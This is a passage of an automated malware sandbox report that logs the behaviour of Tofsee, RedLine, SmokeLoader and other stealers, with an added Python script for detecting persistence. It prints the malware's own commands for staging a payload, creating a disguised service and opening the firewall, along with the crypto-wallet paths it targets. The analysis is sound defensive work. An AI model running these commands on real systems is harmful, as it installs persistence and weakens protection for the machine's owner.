                           Source: C:\Users\user\AppData\Local\Temp\95C6.exe Process created: C:\Users\user\AppData\Local\Temp\95C6.exe C:\Users\user\AppData\Local\Temp\95C6.exe
                           Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6760 -ip 6760
                           Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6760 -s 520
                           Source: C:\Users\user\AppData\Local\Temp\E2A6.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\txlhcyih\
                           Source: C:\Users\user\AppData\Local\Temp\E2A6.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\gaystiqf.exe" C:\Windows\SysWOW64\txlhcyih\
                           Source: C:\Users\user\AppData\Local\Temp\E2A6.exe Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create txlhcyih binPath= "C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe /d\"C:\Users\user\AppData\Local\Temp\E2A6.exe\"" type= own start= auto DisplayName= "wifi support
                           Source: C:\Users\user\AppData\Local\Temp\E2A6.exe Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description txlhcyih "wifi internet conection
                           Source: C:\Users\user\AppData\Local\Temp\E2A6.exe Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start txlhcyih
                           Source: C:\Users\user\AppData\Local\Temp\E2A6.exe Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                           Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Process created: C:\Users\user\AppData\Local\Temp\FA5C.exe C:\Users\user\AppData\Local\Temp\FA5C.exe
                           Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
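                           The E2A6.exe command lines recorded above form one persistence chain: a fresh subdirectory is created under SysWOW64, the payload is moved there from the user's Temp folder, a service is registered with sc.exe whose binPath points into that subdirectory and whose argument references the Temp dropper, the service is started, and netsh adds an inbound allow rule for svchost.exe, the process the service then hollows. The following Python is an added detection example, not part of this sandbox report or of any vendor product: it tags process-creation command lines with those traits and correlates them per parent process. The sample events are the report's own command lines plus two constructed benign events; the tag names, the chain rule and the "subdirectory of System32/SysWOW64" heuristic are the example's own assumptions, and that heuristic is a scoring signal rather than a verdict, because a few legitimate services do live in such subdirectories (System32\wbem, for instance).

```python
import re
from collections import defaultdict

# Windows system directories, lowercased, as the report records them.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
TEMP_MARKER = "\\appdata\\local\\temp\\"

# Constructed sample: (parent image, command line) pairs taken from the report for
# E2A6.exe, followed by two constructed benign events the rules must stay quiet on.
SAMPLE_EVENTS = [
    ("E2A6.exe", r'"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\txlhcyih' + "\\"),
    ("E2A6.exe", r'"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\gaystiqf.exe" C:\Windows\SysWOW64\txlhcyih' + "\\"),
    ("E2A6.exe", r'C:\Windows\System32\sc.exe" create txlhcyih binPath= "C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe /d\"C:\Users\user\AppData\Local\Temp\E2A6.exe\"" type= own start= auto DisplayName= "wifi support'),
    ("E2A6.exe", r'C:\Windows\System32\sc.exe" description txlhcyih "wifi internet conection'),
    ("E2A6.exe", r'"C:\Windows\System32\sc.exe" start txlhcyih'),
    ("E2A6.exe", r'"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul'),
    ("services.exe", r"C:\Windows\System32\svchost.exe -k netsvcs -p"),                       # constructed, benign
    ("setup.exe", r'"C:\Windows\System32\sc.exe" create VendorAgent binPath= "C:\Program Files\Vendor\agent.exe" start= auto'),  # constructed, benign
]


def image_name(cmd):
    """Lower-cased file name of the executable at the start of a command line (quoted or not)."""
    m = re.match(r'\s*"?([^"]*?\.exe)', cmd, re.I)
    return m.group(1).rsplit("\\", 1)[-1].lower() if m else ""


def in_system_subdir(path):
    """True when path sits in a subdirectory beneath System32/SysWOW64, not directly in it.
    Heuristic (assumption): legitimate services rarely, but sometimes, live there."""
    p = path.lower()
    for d in SYSTEM_DIRS:
        if p.startswith(d):
            return "\\" in p[len(d):]
    return False


def classify(cmd):
    """Return the set of suspicious traits exhibited by one process-creation command line."""
    low = cmd.lower()
    image = image_name(cmd)
    tags = set()

    # sc.exe create ... binPath= "<exe> <args>": service binary location and argument origin.
    if image == "sc.exe" and re.search(r"\bcreate\b", low):
        m = re.search(r'binpath=\s*"?\s*([a-z]:\\[^"]*?\.exe)', low)
        if m and in_system_subdir(m.group(1)):
            tags.add("service_in_system_subdir")
        if TEMP_MARKER in low:
            tags.add("service_args_reference_temp")

    # netsh advfirewall firewall add rule ... action=allow program="...svchost.exe"
    if image == "netsh.exe" and "advfirewall" in low and "add rule" in low and "action=allow" in low:
        m = re.search(r'program="?([^"\s]+)', low)
        if m and m.group(1).rsplit("\\", 1)[-1] == "svchost.exe":
            tags.add("firewall_allow_svchost")

    # cmd.exe /C move <Temp exe> <system dir>  and  cmd.exe /C mkdir <system dir>\...
    if image == "cmd.exe":
        m = re.search(r'move\s+(?:/y\s+)?"?([^"]+\.exe)"?\s+(\S+)', low)
        if m and TEMP_MARKER in m.group(1) and m.group(2).startswith(SYSTEM_DIRS):
            tags.add("staged_from_temp_into_system_dir")
        m = re.search(r"mkdir\s+(\S+)", low)
        if m and m.group(1).startswith(SYSTEM_DIRS):
            tags.add("mkdir_under_system_dir")
    return tags


def correlate(events):
    """Aggregate tags per parent image. A parent that installs a service in a system
    subdirectory and also staged its binary from Temp or opened the firewall for svchost
    is reported as a persistence chain; parents with no tags are omitted."""
    per_parent = defaultdict(set)
    for parent, cmd in events:
        per_parent[parent] |= classify(cmd)
    alerts = {}
    for parent, tags in per_parent.items():
        if not tags:
            continue
        chain = "service_in_system_subdir" in tags and bool(
            tags & {"staged_from_temp_into_system_dir", "firewall_allow_svchost"}
        )
        alerts[parent] = {"tags": sorted(tags), "persistence_chain": chain}
    return alerts


if __name__ == "__main__":
    for parent, alert in correlate(SAMPLE_EVENTS).items():
        print(parent, alert)
```

                           Run against the sample, only E2A6.exe is reported, with all five tags and persistence_chain set; the benign svchost.exe launch and the vendor service under Program Files produce no tags. Feeding real Sysmon Event ID 1 or Security 4688 command lines into correlate() is the intended use; the per-parent grouping is what separates this chain from an administrator who legitimately runs sc.exe and netsh.exe in unrelated sessions.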
                           Source: C:\Users\user\AppData\Local\Temp\E2A6.exe Code function: 19_2_00406EDD AllocateAndInitializeSid,CheckTokenMembership,FreeSid,
                           Source: C:\Users\user\AppData\Local\Temp\E2A6.exe Code function: 19_2_00407809 CreateThread,GetUserNameA,LookupAccountNameA,GetLengthSid,GetFileSecurityA,GetSecurityDescriptorOwner,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetFileSecurityA,LocalFree,GetSecurityDescriptorDacl,GetAce,EqualSid,DeleteAce,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetFileSecurityA,LocalFree,
                           Source: explorer.exe, 00000005.00000000.676184859.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.703934881.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.687023763.0000000000AD8000.00000004.00000020.sdmp Binary or memory string: ProgmanMD6
                           Source: explorer.exe, 00000005.00000000.704364672.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.687403349.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.676325321.0000000001080000.00000002.00020000.sdmp, 8A6B.exe, 0000000C.00000000.765387857.0000000000CD0000.00000002.00020000.sdmp, 8A6B.exe, 0000000C.00000000.764420034.0000000000CD0000.00000002.00020000.sdmp Binary or memory string: Program Manager
                           Source: explorer.exe, 00000005.00000000.708212604.0000000005E50000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.704364672.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.687403349.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.676325321.0000000001080000.00000002.00020000.sdmp, 8A6B.exe, 0000000C.00000000.765387857.0000000000CD0000.00000002.00020000.sdmp, 8A6B.exe, 0000000C.00000000.764420034.0000000000CD0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
                           Source: explorer.exe, 00000005.00000000.704364672.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.687403349.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.676325321.0000000001080000.00000002.00020000.sdmp, 8A6B.exe, 0000000C.00000000.765387857.0000000000CD0000.00000002.00020000.sdmp, 8A6B.exe, 0000000C.00000000.764420034.0000000000CD0000.00000002.00020000.sdmp Binary or memory string: Progman
                           Source: explorer.exe, 00000005.00000000.704364672.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.687403349.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.676325321.0000000001080000.00000002.00020000.sdmp, 8A6B.exe, 0000000C.00000000.765387857.0000000000CD0000.00000002.00020000.sdmp, 8A6B.exe, 0000000C.00000000.764420034.0000000000CD0000.00000002.00020000.sdmp Binary or memory string: Progmanlock
                           Source: explorer.exe, 00000005.00000000.681077629.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.711046349.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.698401055.000000000A716000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd5D
                           Source: C:\Users\user\Desktop\sbxGIUIhRd.exe Code function: GetLocaleInfoA,
                           Source: C:\Users\user\AppData\Local\Temp\8A6B.exe Code function: GetLocaleInfoA,
                           Source: C:\Users\user\AppData\Local\Temp\CFE8.exe Code function: GetProcessHeap,RtlAllocateHeap,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,memset,LocalFree,
                           Source: C:\Users\user\AppData\Local\Temp\CFE8.exe Code function: GetProcessHeap,RtlAllocateHeap,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,memset,LocalFree,
                           Source: C:\Users\user\AppData\Local\Temp\E2A6.exe Queries volume information: C:\ VolumeInformation
                           Source: C:\Users\user\AppData\Local\Temp\E2A6.exe Queries volume information: C:\ VolumeInformation
                           Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Queries volume information: C:\Users\user\AppData\Local\Temp\FA5C.exe VolumeInformation
                           Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                           Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                           Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                           Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
                           Source: C:\Windows\SysWOW64\netsh.exe Queries volume information: C:\ VolumeInformation
                           Source: C:\Windows\SysWOW64\netsh.exe Queries volume information: C:\ VolumeInformation
                           Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe Queries volume information: C:\ VolumeInformation
                           Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe Queries volume information: C:\ VolumeInformation
                           Source: C:\Windows\SysWOW64\svchost.exe Queries volume information: C:\ VolumeInformation
                           Source: C:\Windows\SysWOW64\svchost.exe Queries volume information: C:\ VolumeInformation
                           Source: C:\Windows\SysWOW64\svchost.exe Queries volume information: C:\ VolumeInformation
                           Source: C:\Windows\SysWOW64\svchost.exe Queries volume information: C:\ VolumeInformation
                           Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Queries volume information: C:\Users\user\AppData\Local\Temp\FA5C.exe VolumeInformation
                           Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                           Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                           Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                           Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                           Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                           Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                           Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                           Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                           Source: C:\Users\user\Desktop\sbxGIUIhRd.exe Code function: 0_2_00419EFB __vswprintf,_putc,__wrename,_atexit,_malloc,_realloc,_ferror,GetBinaryTypeA,SetCurrentDirectoryA,Process32NextW,InitializeCriticalSection,QueryDosDeviceW,AssignProcessToJobObject,GlobalAddAtomW,DeleteAtom,WriteProfileStringA,GetFullPathNameA,FindNextVolumeMountPointW,GetCompressedFileSizeA,SetNamedPipeHandleState,lstrcpynA,GetProcessVersion,GetConsoleAliasesLengthW,UnregisterWait,GetProcessHandleCount,CancelWaitableTimer,SetFileApisToANSI,CreateIoCompletionPort,FindClose,SetEndOfFile,GetCommMask,LocalLock,OpenMutexA,GetLastError,HeapFree,GetConsoleMode,WriteConsoleOutputCharacterA,GetModuleHandleW,GetConsoleMode,FreeEnvironmentStringsA,GetWriteWatch,GetConsoleAliasExesLengthW,_lopen,FileTimeToLocalFileTime,SetCommState,EnumDateFormatsA,TransactNamedPipe,WriteConsoleInputW,GetConsoleAliasExesLengthA,GetAtomNameW,FreeConsole,FlushConsoleInputBuffer,GetConsoleAliasA,SetConsoleCP,VerSetConditionMask,LockFile,SetSystemTime,SetThreadExecutionState,VerLanguageNameW,lstrcpyA,SetFileShortNameW,GetOverlappedResult,GetPrivateProfileSectionW,FreeEnvironmentStringsW,CreateSemaphoreA,GetLocalTime,EnumTimeFormatsW,FindResourceExW,GetPrivateProfileSectionNamesW,GetOverlappedResult,WaitNamedPipeA,TransmitCommChar,CreateSemaphoreW,GetBinaryTypeW,PeekConsoleInputW,BuildCommDCBW,UnregisterWaitEx,GlobalLock,GetOverlappedResult,GetProcAddress,MoveFileExW,GetThreadContext,ResetEvent,FindActCtxSectionStringA,_memset,SetDefaultCommConfigW,lstrcmpW,HeapUnlock,GetConsoleMode,GetVolumePathNameA,MoveFileW,Process32NextW,GetFileAttributesExA,GetDriveTypeA,TryEnterCriticalSection,GetPrivateProfileStructW,WritePrivateProfileSectionA,GetPrivateProfileSectionW,GetSystemTimeAdjustment,WriteConsoleW,EndUpdateResourceW,FindVolumeMountPointClose,DefineDosDeviceW,InterlockedExchange,SetMailslotInfo,GetTapeParameters,CreateActCtxW,FindCloseChangeNotification,GlobalFindAtomA,TerminateProcess,GetSystemWindowsDirectoryW,GetVersion,SetConsoleMode,ReadFileScatter,lstrcmpA,GetPrivateProfileSectionW,DebugBreak,DeleteVolumeMountPointA,
                           Source: C:\Users\user\AppData\Local\Temp\CFE8.exe Code function: 18_2_0040AD40 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,
                           Source: C:\Users\user\AppData\Local\Temp\CFE8.exe Code function: 18_2_0040ACA0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,
                           Source: C:\Users\user\AppData\Local\Temp\E2A6.exe Code function: 19_2_0040405E CreateEventA,ExitProcess,CloseHandle,CreateNamedPipeA,Sleep,CloseHandle,ConnectNamedPipe,GetLastError,DisconnectNamedPipe,CloseHandle,CloseHandle,CloseHandle,
                           Source: C:\Users\user\Desktop\sbxGIUIhRd.exe Code function: 0_2_00419EFB __vswprintf,_putc,__wrename,_atexit,_malloc,_realloc,_ferror,GetBinaryTypeA,SetCurrentDirectoryA,Process32NextW,InitializeCriticalSection,QueryDosDeviceW,AssignProcessToJobObject,GlobalAddAtomW,DeleteAtom,WriteProfileStringA,GetFullPathNameA,FindNextVolumeMountPointW,GetCompressedFileSizeA,SetNamedPipeHandleState,lstrcpynA,GetProcessVersion,GetConsoleAliasesLengthW,UnregisterWait,GetProcessHandleCount,CancelWaitableTimer,SetFileApisToANSI,CreateIoCompletionPort,FindClose,SetEndOfFile,GetCommMask,LocalLock,OpenMutexA,GetLastError,HeapFree,GetConsoleMode,WriteConsoleOutputCharacterA,GetModuleHandleW,GetConsoleMode,FreeEnvironmentStringsA,GetWriteWatch,GetConsoleAliasExesLengthW,_lopen,FileTimeToLocalFileTime,SetCommState,EnumDateFormatsA,TransactNamedPipe,WriteConsoleInputW,GetConsoleAliasExesLengthA,GetAtomNameW,FreeConsole,FlushConsoleInputBuffer,GetConsoleAliasA,SetConsoleCP,VerSetConditionMask,LockFile,SetSystemTime,SetThreadExecutionState,VerLanguageNameW,lstrcpyA,SetFileShortNameW,GetOverlappedResult,GetPrivateProfileSectionW,FreeEnvironmentStringsW,CreateSemaphoreA,GetLocalTime,EnumTimeFormatsW,FindResourceExW,GetPrivateProfileSectionNamesW,GetOverlappedResult,WaitNamedPipeA,TransmitCommChar,CreateSemaphoreW,GetBinaryTypeW,PeekConsoleInputW,BuildCommDCBW,UnregisterWaitEx,GlobalLock,GetOverlappedResult,GetProcAddress,MoveFileExW,GetThreadContext,ResetEvent,FindActCtxSectionStringA,_memset,SetDefaultCommConfigW,lstrcmpW,HeapUnlock,GetConsoleMode,GetVolumePathNameA,MoveFileW,Process32NextW,GetFileAttributesExA,GetDriveTypeA,TryEnterCriticalSection,GetPrivateProfileStructW,WritePrivateProfileSectionA,GetPrivateProfileSectionW,GetSystemTimeAdjustment,WriteConsoleW,EndUpdateResourceW,FindVolumeMountPointClose,DefineDosDeviceW,InterlockedExchange,SetMailslotInfo,GetTapeParameters,CreateActCtxW,FindCloseChangeNotification,GlobalFindAtomA,TerminateProcess,GetSystemWindowsDirectoryW,GetVersion,SetConsoleMode,ReadFileScatter,lstrcmpA,GetPrivateProfileSectionW,DebugBreak,DeleteVolumeMountPointA,

                          Lowering of HIPS / PFW / Operating System Security Settings:

                           Uses netsh to modify the Windows network and firewall settings
                           Source: C:\Users\user\AppData\Local\Temp\E2A6.exe Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                           Modifies the windows firewall
                           Source: C:\Users\user\AppData\Local\Temp\E2A6.exe Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul

                          Stealing of Sensitive Information:

                           Yara detected RedLine Stealer
                           Source: Yara match File source: 39.0.FA5C.exe.400000.6.unpack, type: UNPACKEDPE
                           Source: Yara match File source: 39.0.FA5C.exe.400000.12.unpack, type: UNPACKEDPE
                           Source: Yara match File source: 39.0.FA5C.exe.400000.4.unpack, type: UNPACKEDPE
                           Source: Yara match File source: 39.0.FA5C.exe.400000.8.unpack, type: UNPACKEDPE
                           Source: Yara match File source: 39.2.FA5C.exe.400000.0.unpack, type: UNPACKEDPE
                           Source: Yara match File source: 21.2.FA5C.exe.3a8f910.1.raw.unpack, type: UNPACKEDPE
                           Source: Yara match File source: 21.2.FA5C.exe.3a8f910.1.unpack, type: UNPACKEDPE
                           Source: Yara match File source: 39.0.FA5C.exe.400000.10.unpack, type: UNPACKEDPE
                           Source: Yara match File source: 00000027.00000002.933081162.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                           Source: Yara match File source: 00000027.00000000.824314083.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                           Source: Yara match File source: 00000027.00000000.824767570.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                           Source: Yara match File source: 00000027.00000000.823843288.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                           Source: Yara match File source: 00000015.00000002.833273258.0000000003971000.00000004.00000001.sdmp, type: MEMORY
                           Source: Yara match File source: 00000027.00000000.825252840.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                           Source: Yara match File source: dump.pcap, type: PCAP
                           Yara detected Amadeys stealer DLL
                           Source: Yara match File source: 00000030.00000002.933969192.0000000000650000.00000040.00000001.sdmp, type: MEMORY
                           Source: Yara match File source: 0000002B.00000002.871731514.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                           Source: Yara match File source: 0000002B.00000003.859441391.00000000006B0000.00000004.00000001.sdmp, type: MEMORY
                           Source: Yara match File source: 00000030.00000002.933631329.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                           Source: Yara match File source: 00000030.00000003.872732523.0000000000690000.00000004.00000001.sdmp, type: MEMORY
                           Source: Yara match File source: 0000002B.00000002.872637287.0000000000650000.00000040.00000001.sdmp, type: MEMORY
                           Yara detected SmokeLoader
                           Source: Yara match File source: 16.2.95C6.exe.400000.0.unpack, type: UNPACKEDPE
                           Source: Yara match File source: 1.0.sbxGIUIhRd.exe.400000.6.unpack, type: UNPACKEDPE
                           Source: Yara match File source: 1.0.sbxGIUIhRd.exe.400000.4.unpack, type: UNPACKEDPE
                           Source: Yara match File source: 16.0.95C6.exe.400000.4.unpack, type: UNPACKEDPE
                           Source: Yara match File source: 10.1.adijaeg.400000.0.unpack, type: UNPACKEDPE
                           Source: Yara match File source: 1.0.sbxGIUIhRd.exe.400000.5.unpack, type: UNPACKEDPE
                           Source: Yara match File source: 1.2.sbxGIUIhRd.exe.400000.0.unpack, type: UNPACKEDPE
                           Source: Yara match File source: 1.1.sbxGIUIhRd.exe.400000.0.unpack, type: UNPACKEDPE
                           Source: Yara match File source: 13.2.95C6.exe.5615a0.1.raw.unpack, type: UNPACKEDPE
                           Source: Yara match File source: 16.0.95C6.exe.400000.6.unpack, type: UNPACKEDPE
                           Source: Yara match File source: 9.2.adijaeg.5615a0.1.raw.unpack, type: UNPACKEDPE
                           Source: Yara match File source: 16.1.95C6.exe.400000.0.unpack, type: UNPACKEDPE
                           Source: Yara match File source: 16.0.95C6.exe.400000.5.unpack, type: UNPACKEDPE
                           Source: Yara match File source: 0.2.sbxGIUIhRd.exe.5615a0.1.raw.unpack, type: UNPACKEDPE
                           Source: Yara match File source: 10.2.adijaeg.400000.0.unpack, type: UNPACKEDPE
                           Source: Yara match File source: 0000000A.00000002.767064606.0000000000561000.00000004.00020000.sdmp, type: MEMORY
                           Source: Yara match File source: 00000001.00000002.719013921.0000000000580000.00000004.00000001.sdmp, type: MEMORY
                           Source: Yara match File source: 0000002C.00000002.921866016.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
                           Source: Yara match File source: 00000005.00000000.706607181.0000000004DC1000.00000020.00020000.sdmp, type: MEMORY
                           Source: Yara match File source: 00000010.00000002.787707490.0000000002051000.00000004.00020000.sdmp, type: MEMORY
                           Source: Yara match File source: 00000001.00000002.719027443.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
                           Source: Yara match File source: 00000010.00000002.787566424.0000000002030000.00000004.00000001.sdmp, type: MEMORY
                           Source: Yara match File source: 0000002C.00000002.920736016.0000000000530000.00000004.00000001.sdmp, type: MEMORY
                           Source: Yara match File source: 0000000A.00000002.766964771.0000000000420000.00000004.00000001.sdmp, type: MEMORY
                           Yara detected Amadey bot
                           Source: Yara match File source: dump.pcap, type: PCAP
                           Source: Yara match File source: 00000030.00000002.934394338.00000000007C2000.00000004.00000001.sdmp, type: MEMORY
                           Source: Yara match File source: 00000030.00000002.934464446.000000000081C000.00000004.00000001.sdmp, type: MEMORY
                           Yara detected Raccoon Stealer
                           Source: Yara match File source: 00000029.00000002.932916871.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                           Source: Yara match File source: 00000029.00000003.866964276.0000000004E90000.00000004.00000001.sdmp, type: MEMORY
                           Yara detected Vidar stealer
                           Source: Yara match File source: 00000012.00000002.778871372.0000000000873000.00000004.00000001.sdmp, type: MEMORY
                           Source: Yara match File source: Process Memory Space: CFE8.exe PID: 4296, type: MEMORYSTR
                           Yara detected Tofsee
                           Source: Yara match File source: 19.2.E2A6.exe.560e50.1.raw.unpack, type: UNPACKEDPE
                           Source: Yara match File source: 38.2.svchost.exe.2360000.0.raw.unpack, type: UNPACKEDPE
                           Source: Yara match File source: 35.3.gaystiqf.exe.650000.0.raw.unpack, type: UNPACKEDPE
                           Source: Yara match File source: 19.3.E2A6.exe.580000.0.raw.unpack, type: UNPACKEDPE
                           Source: Yara match File source: 19.2.E2A6.exe.400000.0.unpack, type: UNPACKEDPE
                           Source: Yara match File source: 35.2.gaystiqf.exe.850000.2.raw.unpack, type: UNPACKEDPE
                           Source: Yara match File source: 35.2.gaystiqf.exe.400000.0.unpack, type: UNPACKEDPE
                           Source: Yara match File source: 19.2.E2A6.exe.400000.0.raw.unpack, type: UNPACKEDPE
                           Source: Yara match File source: 35.2.gaystiqf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                           Source: Yara match File source: 35.2.gaystiqf.exe.630e50.1.raw.unpack, type: UNPACKEDPE
                           Source: Yara match File source: 38.2.svchost.exe.2360000.0.unpack, type: UNPACKEDPE
                           Source: Yara match File source: 35.2.gaystiqf.exe.850000.2.unpack, type: UNPACKEDPE
                           Source: Yara match File source: 00000026.00000002.979557466.0000000002360000.00000040.00000001.sdmp, type: MEMORY
                           Source: Yara match File source: 00000023.00000002.809196350.0000000000630000.00000040.00000001.sdmp, type: MEMORY
                           Source: Yara match File source: 00000023.00000003.805779040.0000000000650000.00000004.00000001.sdmp, type: MEMORY
                           Source: Yara match File source: 00000023.00000002.808208197.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                           Source: Yara match File source: 00000013.00000002.803426452.0000000000560000.00000040.00000001.sdmp, type: MEMORY
                           Source: Yara match File source: 00000013.00000003.785124178.0000000000580000.00000004.00000001.sdmp, type: MEMORY
                           Source: Yara match File source: 00000013.00000002.803137475.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                           Source: Yara match File source: 00000023.00000002.809631719.0000000000850000.00000004.00000001.sdmp, type: MEMORY
                           Source: Yara match File source: Process Memory Space: E2A6.exe PID: 4752, type: MEMORYSTR
                           Source: Yara match File source: Process Memory Space: gaystiqf.exe PID: 4588, type: MEMORYSTR
                           Source: Yara match File source: Process Memory Space: svchost.exe PID: 5288, type: MEMORYSTR
                           Found many strings related to Crypto-Wallets (likely being stolen)
                           Source: CFE8.exe, 00000012.00000002.778871372.0000000000873000.00000004.00000001.sdmp String found in binary or memory: \Electrum\wallets\
                           Source: CFE8.exe, 00000012.00000002.778871372.0000000000873000.00000004.00000001.sdmp String found in binary or memory: \ElectronCash\wallets\
                           Source: CFE8.exe, 00000012.00000002.778871372.0000000000873000.00000004.00000001.sdmp String found in binary or memory: \Electrum\wallets\
                           Source: CFE8.exe, 00000012.00000002.778871372.0000000000873000.00000004.00000001.sdmp String found in binary or memory: window-state.json
                           Source: CFE8.exe, 00000012.00000002.778871372.0000000000873000.00000004.00000001.sdmp String found in binary or memory: \jaxx\Local Storage\
                           Source: CFE8.exe, 00000012.00000002.778871372.0000000000873000.00000004.00000001.sdmp String found in binary or memory: exodus.conf.json
                           Source: CFE8.exe, 00000012.00000002.778871372.0000000000873000.00000004.00000001.sdmp String found in binary or memory: \Exodus\exodus.wallet\
                           Source: CFE8.exe, 00000012.00000002.778871372.0000000000873000.00000004.00000001.sdmp String found in binary or memory: info.seco
                           Source: CFE8.exe, 00000012.00000002.778871372.0000000000873000.00000004.00000001.sdmp String found in binary or memory: ElectrumLTC
                           Source: CFE8.exe, 00000012.00000002.778871372.0000000000873000.00000004.00000001.sdmp String found in binary or memory: \jaxx\Local Storage\
